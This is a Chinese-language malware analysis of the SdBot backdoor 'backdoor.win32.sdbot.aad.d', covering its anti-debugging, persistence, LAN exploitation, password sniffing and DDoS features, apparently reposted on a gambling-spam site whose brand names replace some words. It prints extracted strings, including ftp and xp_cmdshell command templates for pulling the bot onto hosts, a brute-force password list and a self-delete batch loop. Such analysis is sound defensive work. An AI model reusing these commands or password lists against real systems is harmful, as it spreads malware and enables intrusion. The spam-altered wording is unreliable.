东方微点-yb体育官方

  yb体育官方  
yb体育官方-yb亚博全站首页  |  微点新闻  |  业界动态  |  安全资讯  |   |   |  网络版yb亚博全站首页
 |   |   |   |   |   |  各地代理商
 

后门程序backdoor.win32.sdbot.aad.d
来源:  2009-02-02 14:18:42

捕获时间

2009-1-28

病毒摘要

该样本是使用microsoft visual c 6.0编写的后门程序,由微点主动防御软件自动捕获,加winunpack壳后长度为53,528 字节,图标为“”,病毒扩展名为exe,主要通过“网页木马”、“文件捆绑”的方式传播,病毒主要作为被入侵系统的后门使用。



感染对象


windows 2000/windows xp/windows 2003

传播途径

网页木马,文件捆绑,系统和软件漏洞,系统共享

防范措施

已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);


                             图1 微点主动防御软件自动捕获未知病毒(未升级)

如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"backdoor.win32.sdbot.aad.d”,请直接选择删除(如图2)。


                            图2   微点主动防御软件升级后截获已知病毒

对于未使用微点主动防御软件的用户,微点反病毒专家建议
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取yb亚博全站首页的技术支持。
3、开启windows自动更新,及时打好漏洞补丁。

病毒分析

该样本程序被执行后,动态获取所需的api,并调试环境检测,一旦检测到调试自杀后退出,没检测到继续,经过解密字符串后,检查自身是否已经运行,如果已经运行,则退出,否则拷贝自身到%systemroot%目录,然后设置文件时间与explorer.exe相同,并设置文件属性为系统加隐藏加只读,并设置派发服务函数,修改注册表与安装服务,成功后退出。

具体行为分析:
1.反调试手段:
(1) 利用"isdebuggerpresent"检测调试器
(2) 利用gettickout检查时间差检测是否被调试
(3) 通过检查注册表检测是否在虚拟机里运行:
ascii "software\vmware, inc.\vmware tools"
(4) 通过检查设备对象\\.\ntice检测softice

2. 是否已经运行检测:
通过检测自身路径判断是否第一次运行:
如果在%systemroot%,表示已经运行,直接退出,否则拷贝自身到此目录,名称为“msdvd.exe”。

3. 注册表操作:

注册表操作函数通过判断最后一个参数的值有不同的操作:
最后一个参数为1时,添加键值:

  
hkey = hkey_local_machine
subkey = "software\\microsoft\\windows\\currentversion\\shell extensions"
value = “c:\documents and settings\administrator\桌面\ msdvd.exe”


4.创建服务:

 
servicename = "microsoftdvd"
displayname = "microsoftdvdhelp"
|starttype = service_auto_start
|binarypathname = """c:\windows\msdvd.exe"""


5.派发服务函数主要功能:
是负责开线程,主要功能在线程函数里实现,功能如下:
(1)        设置%systemroot%\msdvd.exe 属性为正常,然后删除文件,连续删除3次
(2)        开启一个线程监控注册表,每600ms检测一次,发现被修改就改回来

 
subkey = software\microsoft\windows nt\currentversion\winlogon
key = shell


(3)        新开启一个线程枚举网络共享

 
'd$\windows\system32',0 ;
'd$\winnt\system32',0 ;
'admin$\system32',0  ;
'admin$',0


(4)        释放名为rdriv.sys的驱动,并创建服务加载驱动,驱动用于保护病毒进程不被结束

(5)        通过设置注册表删除服务

 
subkey = system\\currentcontrolset\\control\
valuename = waittokillservicetimeout
value = 7000


(6)  开端口等待病毒作者连接,这个后门除了支持一般的文件,注册表操作外,还提供了irc后门功能,支持代理跳板扫描,各种ddos,更新服务端等很多自定义命令。

(7)  扫描局域网,利用lsass, ftpd, mssqlserver的各种已知漏洞溢出局域网其他主机,溢出成功后,上传自身并安装后门,还尝试暴力破解sql server的密码

  
echo quit >> o &ftp -n -s:o &del /f /q o &%s
exec master..xp_cmdshell ',27h,'del eq&echo open %s %d >> eq&echo us
user is running mirc %s, connected to %s (%s:%s) using the nic

' admin ',0                ;
' root ',0                ;
' server',0                ;
' asdf',0                ;
'administrator',0  

'!@#$%^&',0          ;
'!@#$%^',0           ;
'!@#$%',0            ;
'!@#$',0             ;
'654321',0           ;
'123456',0           ;
'12345',0            ;
'1234',0             ;
'123',0              ;
'12',0               ;
'111',0              ;
'1',0                ;


(8) 带有sniffer功能:嗅探各种密码

 
ftp sniff "%s:%d" to "%s:%d": - "%s"',0ah,0
'irc sniff "%s:%d" to "%s:%d": - "%s"',0
'bot sniff "%s:%d" to "%s:%d": - "%s"
pop3 password2',0  
'pop3 server',0     
'pop3 user name',0   
'httpmail password2',0
'hotmail',0


(9)  从注册表读区浏览器保存的密码:

  
software\microsoft\internet account manager\accounts
ie auto-complete:
ie password protected:


(10) 带有ddos功能:

  
'ackflood',0
'icmpflood',0
'phatwonk',0
'synflood',0
'udpflood'


(11) 自删除:

  
'@echo off',0dh,0ah  ;
':repeat',0dh,0ah
'del "%s">nul',0dh,0ah
'if exist "%s" goto repeat',0dh,0ah
'del "%%0"'

 

免费体验
下  载

网站地图